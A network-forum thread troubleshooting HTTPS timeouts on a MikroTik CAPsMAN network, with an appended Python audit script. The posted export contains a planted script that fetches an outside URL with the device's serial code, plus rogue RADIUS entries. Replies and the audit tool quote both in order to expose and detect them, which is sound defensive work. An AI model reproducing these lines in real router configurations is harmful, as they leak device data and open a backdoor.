Some HTTPS web sites won't work!

Hi everyone,
I really hope someone here will help solve this issue. I have recently set up CAPsMAN for one of my clients. His antenna (RB SXT) acts as a router and the wifi APs are set up as bridges (2x RB 951G).

The client’s devices won’t show certain sites. I suspected that this could be some sort of MTU issue, but that doesn’t seem to be the case, since he has the MTU size on the bridges set to 1500.
The DNS servers should be working fine and I don’t have any special filter rules that could cause the issue.

I have tried

  1. rebooting the CAPsMAN server and CAPsMAN radios - doesn’t work
  2. downgrading/upgrading RouterOS on all devices - doesn’t work
  3. all devices can PING and TRACEROUTE to all the websites without problem
  4. if I try to connect to the site via web browser it prints “connection time out”
  5. I’ve tried to add a mangle rule as suggested in similar topics (see export below) - doesn’t work
  6. ftp and tcp connections work just fine
  7. his IP isn’t blocked by the ISP/site and there’s no blocking on ports either

At this point I’m really lost, as I’ve never dealt with this before. I hope that someone here can give me advice. Also, if you find an issue with my configuration, please add some explanation to your response for future reference. Thank you very much. If you need more info, please ask!

EXPORT:

# jun/25/2018 17:33:26 by RouterOS 6.42.4
# software id = BMRD-B7FI
#
# model = SXT 5nD r2
# serial number = XXXXXXXXXXXX
/interface bridge
add fast-forward=no mtu=1520 name=bridge1 protocol-mode=none
add fast-forward=no mtu=1520 name=bridge2-deti protocol-mode=none
/interface wireless
set [ find default-name=wlan1 ] band=5ghz-a/n country="czech republic" disabled=no ssid=XXXXXX-super-secret-ssid
/caps-man configuration
add country="czech republic" datapath.bridge=bridge1 mode=ap name=cfg1 security.authentication-types=wpa-psk,wpa2-psk security.encryption=aes-ccm,tkip ssid=CP361
add country="czech republic" datapath.bridge=bridge2-deti mode=ap name=cfg2-deti security.authentication-types=wpa-psk,wpa2-psk security.encryption=aes-ccm,tkip ssid=CP361-deti
/caps-man interface
add configuration=cfg1 disabled=no l2mtu=1600 mac-address=CC:2D:E0:3B:BB:C5 master-interface=none name=cap-garaz radio-mac=CC:2D:E0:3B:BB:C5
add configuration=cfg2-deti disabled=no l2mtu=1600 mac-address=CE:2D:E0:3B:BB:C5 master-interface=cap-garaz name=cap-garaz-deti radio-mac=00:00:00:00:00:00
add configuration=cfg1 disabled=no l2mtu=1600 mac-address=CC:2D:E0:17:E8:30 master-interface=none name=cap-podkrovi radio-mac=CC:2D:E0:17:E8:30
add configuration=cfg2-deti disabled=no l2mtu=1600 mac-address=CE:2D:E0:17:E8:30 master-interface=cap-podkrovi name=cap-podkrovi-deti radio-mac=00:00:00:00:00:00
/interface wireless channels
add band=2ghz-b/g/n frequency=2412 list=channels name=ch1 width=20
add band=2ghz-b/g/n frequency=2417 list=channels name=ch2 width=20
add band=2ghz-b/g/n frequency=2422 list=channels name=ch3 width=20
add band=2ghz-b/g/n frequency=2427 list=channels name=ch4 width=20
add band=2ghz-b/g/n frequency=2432 list=channels name=ch5 width=20
add band=2ghz-b/g/n frequency=2437 list=channels name=ch6 width=20
add band=2ghz-b/g/n frequency=2442 list=channels name=ch7 width=20
add band=2ghz-b/g/n frequency=2447 list=channels name=ch8 width=20
add band=2ghz-b/g/n frequency=2452 list=channels name=ch9 width=20
add band=2ghz-b/g/n frequency=2457 list=channels name=ch10 width=20
add band=2ghz-b/g/n frequency=2462 list=channels name=ch11 width=20
add band=2ghz-b/g/n frequency=2467 list=channels name=ch12 width=20
add band=2ghz-b/g/n frequency=2472 list=channels name=ch13 width=20
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool1 ranges=192.168.10.100-192.168.10.200
add name=pool1 ranges=10.1.1.2-10.1.1.250
add name=dhcp_pool6 ranges=192.168.11.100-192.168.11.200
/ip dhcp-server
add address-pool=dhcp_pool1 authoritative=after-2sec-delay disabled=no interface=bridge1 lease-time=1w name=dhcp1
add address-pool=dhcp_pool6 disabled=no interface=bridge2-deti lease-time=1w name=dhcp2
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test remote-address=pool1 use-encryption=yes
/queue simple
add disabled=yes name=ap-podkrovi target=192.168.10.2/32
add disabled=yes name=ap-garaz target=192.168.10.3/32
add burst-limit=10M/25M burst-threshold=1M/8M burst-time=2m/2m disabled=yes max-limit=2M/10M name=deti target=192.168.11.0/24
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/caps-man manager
set enabled=yes
/interface bridge port
add bridge=bridge1 hw=no interface=ether1
/ip firewall connection tracking
set tcp-close-timeout=15s tcp-time-wait-timeout=15s
/interface pptp-server server
set authentication=pap,chap default-profile=test enabled=yes max-mru=1500 max-mtu=1500
/ip address
add address=10.5.52.195/27 interface=wlan1 network=10.5.52.192
add address=192.168.10.1/24 interface=bridge1 network=192.168.10.0
add address=192.168.11.1/24 interface=bridge2-deti network=192.168.11.0
add address=86.63.210.213 interface=wlan1 network=86.6X.XX.XX
/ip dhcp-server network
add address=192.168.10.0/24 dns-server=8.8.8.8,10.1.255.1 gateway=192.168.10.1
add address=192.168.11.0/24 dns-server=8.8.8.8,10.1.255.1 gateway=192.168.11.1
/ip dns
set servers=10.1.255.1
/ip firewall mangle
add action=change-mss chain=postrouting comment="Clamp MSS to PMTU for Outgoing packets" disabled=yes new-mss=clamp-to-pmtu out-interface=wlan1 passthrough=yes protocol=tcp tcp-flags=syn
add action=change-mss chain=forward new-mss=1500 protocol=tcp tcp-flags=syn tcp-mss=1361-65535
/ip firewall nat
add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=86.6X.XX.XX
add action=dst-nat chain=dstnat disabled=yes dst-port=80 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.0/24 to-ports=80
add action=dst-nat chain=dstnat dst-port=1194 in-interface=wlan1 protocol=udp to-addresses=192.168.10.22
add action=dst-nat chain=dstnat dst-port=8088 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.240
add action=dst-nat chain=dstnat dst-port=8888 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.200
add action=dst-nat chain=dstnat dst-port=20 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.200
add action=dst-nat chain=dstnat dst-port=21 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.200
add action=dst-nat chain=dstnat dst-port=20256 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20256 in-interface=wlan1 protocol=udp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20257 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20257 in-interface=wlan1 protocol=udp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20000 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=20000 in-interface=wlan1 protocol=udp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=502 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=502 in-interface=wlan1 protocol=udp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat dst-port=25573 in-interface=wlan1 protocol=tcp to-addresses=192.168.10.10
add action=dst-nat chain=dstnat comment=wifi-podkrovi dst-port=8080 in-interface=wlan1 protocol=tcp src-address=10.1.255.0/24 to-addresses=192.168.10.2 to-ports=8291
add action=dst-nat chain=dstnat comment=wifi-garaz dst-port=8081 in-interface=wlan1 protocol=tcp src-address=10.1.255.0/24 to-addresses=192.168.10.3 to-ports=8291
add action=masquerade chain=srcnat disabled=yes out-interface=wlan1
add action=masquerade chain=srcnat disabled=yes
add action=masquerade chain=srcnat disabled=yes
add action=masquerade chain=srcnat disabled=yes
add action=masquerade chain=srcnat disabled=yes
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set pptp disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=10.5.52.193
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
/radius incoming
set accept=yes
/system clock
set time-zone-name=Europe/Prague
/system identity
set name=pecinovsky-jan
/system leds
set 0 interface=wlan1
/system logging
add topics=debug,caps
add topics=debug,dhcp
/system routerboard settings
set silent-boot=no
/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\?key=85454d8bb84998fa&action=upload&sncode=F8C49100B20F15CD3F906164FD50CB7A&dynamic=static\")}"

/ip firewall mangle
add out-interface=YOUR_WAN_INTERFACE protocol=tcp tcp-flags=syn action=change-mss new-mss=1300 chain=forward tcp-mss=1301-65535


Try this on the router and see if it helps. Does your ISP use PPPoE? Then you need to change the MTU.

Hello,

Your router seems to have been attacked; check this:

/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx … 98fa&action=upload&sncode=F8C49100B20F15CD3F906164FD50CB7A&dynamic=static\")}"

You should upgrade to the latest stable version and change your password.

Regards,

Yes, I’ve since noticed it and deleted it. I’ve also blocked access to the router, so this shouldn’t cause a problem anymore. But thank you for your advice.

I’ve tried your firewall rule and it still times out when trying to connect to a site.

On to your next question: I’m the ISP, we don’t use PPPoE, and as I’ve said before all MTUs are 1500 or higher on every interface.
I’m really at my wit’s end here. I don’t think that CAPsMAN could cause this, because the PC I test websites on is connected via Ethernet, so CAPsMAN shouldn’t affect it in any way, in my opinion.
I will be glad for any advice, really.

In your configuration we can see :

add action=change-mss chain=forward new-mss=1500 protocol=tcp tcp-flags=syn tcp-mss=1361-65535

It shouldn’t work. And why did you set an MTU of 1520 on your bridges?

Then, your router is still compromised :

/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
/radius incoming
set accept=yes

It depends on your global peer and how they treat MTU ingress and egress from your network (as long as you are 101% sure there is no problem inside). Your router has a problem, but that is “case” number 2. Check DNS and see that it’s working as expected.

I’ve already said I’ve removed RADIUS and the script and disabled every VPN server that could be running.

  • I set 1520 on the bridges because I didn’t know what else to do. There is no problem with MTU sizes.
  • I removed the firewall rules and put in the ones someone suggested in this forum (still doesn’t work).

I’m baffled because not one of our other 5 000 clients has this problem.

Thank you for your advice

So today I noticed the same behaviour on the client’s CAPsMAN radios, because when they tried to auto-update new packages they printed “connection time out”. So I played a little bit with NAT, and since our client has a routed public IP there has been only one NAT rule,

see below

add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=XX.6X.XX.XXX

so I added another rule and it doesn’t time out anymore. Does anyone have an idea why?

/ip firewall nat
add action=masquerade chain=srcnat out-interface=wlan1
add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=XX.6X.XX.XXX

It WORKS!! Thank you!

It also worked for me. Any explanation for this?
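
The replies above each point at a different line of the export: the change-mss rule that sets new-mss=1500 (which cannot reduce any segment on a 1500-byte link, since IPv4+TCP headers already use 40 bytes), the /system script that fetches from an outside host, the five RADIUS entries with incoming requests accepted, and, in the final fix, a second srcnat rule on the same out-interface. The following is an added example, my own code and not anything posted in this thread or shipped by MikroTik: a small offline audit that parses an export in the same format and reports those items. The export excerpt inside it is constructed to mirror the posted one (the fetch key is replaced with REDACTED, the public IP is left partly masked as in the thread), and the finding wording and the 1500-byte default path MTU are assumptions.

```python
"""Offline audit of a RouterOS '/export' in the shape pasted in this thread.
Added example, not code from the thread or from MikroTik. Finding texts and
the default path MTU (1500, a plain Ethernet uplink) are assumptions."""
import re
from typing import Dict, List, Tuple

Command = Tuple[str, str, Dict[str, str]]  # (section, verb, params)

# Constructed excerpt modelled on the posted export, with the '\' line
# continuations a real export carries (the forum copy lost them).
SAMPLE_EXPORT = r'''
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/ip firewall mangle
add action=change-mss chain=forward new-mss=1500 protocol=tcp tcp-flags=syn \
    tcp-mss=1361-65535
/ip firewall nat
add action=masquerade chain=srcnat out-interface=wlan1
add action=src-nat chain=srcnat out-interface=wlan1 to-addresses=86.6X.XX.XX
/radius
add address=47.75.230.175 service=ppp
add address=47.75.230.175 service=ppp
/radius incoming
set accept=yes
/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive \
    source="{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx?key=REDACTED\")}"
'''

# key=value where value is a double-quoted string (\" escapes allowed) or a
# run of non-space characters.
_PAIR = re.compile(r'([A-Za-z0-9_.-]+)=("(?:[^"\\]|\\.)*"|\S+)')
_URL = re.compile(r"https?://[^\s\"'()\\]+")


def parse_export(text: str) -> List[Command]:
    """Split an export into (section, verb, {key: value}) commands. Joins
    '\\'-continued lines, skips '#' comments, drops '[ find ... ]' selectors."""
    lines: List[str] = []
    pending = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            pending += line[:-1].rstrip() + " "
            continue
        lines.append(pending + line)
        pending = ""

    commands: List[Command] = []
    section = ""
    for line in lines:
        if line.startswith("/"):
            section = line
            continue
        verb, _, rest = re.sub(r"\[[^\]]*\]", "", line).partition(" ")
        params = {k: v.strip('"') for k, v in _PAIR.findall(rest)}
        commands.append((section, verb, params))
    return commands


def ipv4_tcp_mss(mtu: int) -> int:
    """Largest TCP MSS for an IPv4 packet of `mtu` bytes (20 IP + 20 TCP header)."""
    return mtu - 40


def audit(commands: List[Command], path_mtu: int = 1500) -> List[str]:
    """Return one finding per item worth a second look."""
    findings: List[str] = []
    srcnat: Dict[str, List[str]] = {}
    radius: List[str] = []
    radius_incoming = False

    for section, verb, p in commands:
        if section == "/ip firewall mangle" and p.get("action") == "change-mss":
            mss = p.get("new-mss", "")
            if mss.isdigit() and int(mss) >= ipv4_tcp_mss(path_mtu):
                findings.append(f"mangle: new-mss={mss} cannot clamp anything; the largest "
                                f"usable MSS on a {path_mtu}-byte path is {ipv4_tcp_mss(path_mtu)}")
        elif section == "/ip firewall nat" and p.get("chain") == "srcnat":
            srcnat.setdefault(p.get("out-interface", "any"), []).append(p.get("action", "?"))
        elif section == "/snmp community" and p.get("addresses") == "0.0.0.0/0":
            findings.append("snmp: community answers to any source (addresses=0.0.0.0/0)")
        elif section == "/radius" and "address" in p:
            radius.append(p["address"])
        elif section == "/radius incoming" and p.get("accept") == "yes":
            radius_incoming = True
        elif section in ("/system script", "/system scheduler"):
            for url in _URL.findall(" ".join(p.values())):
                findings.append(f"{section[1:]}: '{p.get('name', '?')}' fetches {url}")

    for iface, actions in srcnat.items():
        if len(actions) > 1:  # first matching srcnat rule wins; later ones are shadowed
            findings.append(f"nat: {len(actions)} srcnat rules on out-interface={iface} "
                            f"({', '.join(actions)}); rules match top-down, so the later "
                            f"one only sees traffic the first did not already translate")
    if radius:
        findings.append(f"radius: {len(radius)} entries for {', '.join(sorted(set(radius)))}"
                        + ("; incoming requests accepted" if radius_incoming else ""))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_export(SAMPLE_EXPORT)):
        print(finding)
```

Run it against a real `/export` (saved from the terminal or via `/export file=...`) by passing the file contents to `parse_export`; the MSS check only makes sense if `path_mtu` is set to the smallest MTU on the actual upstream path, which is why it is a parameter rather than read from the bridge or wlan settings in the export.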